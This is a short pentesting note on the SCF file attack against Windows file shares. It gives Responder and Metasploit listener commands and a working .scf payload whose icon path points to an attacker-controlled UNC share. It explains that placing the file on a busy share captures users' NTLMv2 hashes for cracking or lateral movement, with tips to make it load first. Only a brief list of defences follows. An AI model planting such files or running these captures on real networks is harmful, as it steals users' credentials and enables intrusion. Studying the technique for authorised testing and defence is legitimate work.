#Active-Directory #Post-Exploitation 

# SCF File Attack

This attack utilizes a SCF (Shell Command File) which points to non-existing resource on the network by a UNC path. An attacker with writable access any file share on the network can use this feature to diverge network traffic and capture potential hashes.

### Capturing Hashes with SCF Files
First we can set up our listener, `responder` to listen to the network traffic. Alternatively one of the Metasploit's modules (`auxiliary/server/capture/smb`) can be used for the same purpose as well:

``` shell
# Using responder
> responder -I <Network Device> -v

# Using metasploit
msf > use auxiliary/server/capture/smb
msf > run
```

The code:

``` shell
[Shell]
Command=2
Iconfile=\\<Attacker IP>\share\test.ico
[Taskbar]
Command=ToggleDesktop
```

With the above code saved as a `.scf` file, it is ready to be to placed on a potential share on the network. Adding the "@" to the front of the file name ensures that the file appear on the top of the current directory. This is useful to ensure that the file will load once the user browse to the infected directory when there's a large number of files/folders in the same directory.

When a user simply browse to the poisoned directory, the SMB protocol will try to access the UNC path. The listeners will then send a poisoned response to which the service respond back with NTLMv2 hashes which can be cracked offline or used for other attacks.

This is an easy way to capture a large number of hashes when placed in busy file share or during busy hours which enables easy lateral movement.

It is also possible to host a malicious payload and have the users execute it automatically when they authenticate into attacker's server with the help of Metasploit framework;
- [SMB Share - SCF File Attacks](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)

### Defensive measures
- Use of Kerberos and SMB Signing
- Disallow write permissions in file shares for unauthenticated users
- Ensure that NTMLv2 hashes are used instead of LanMan

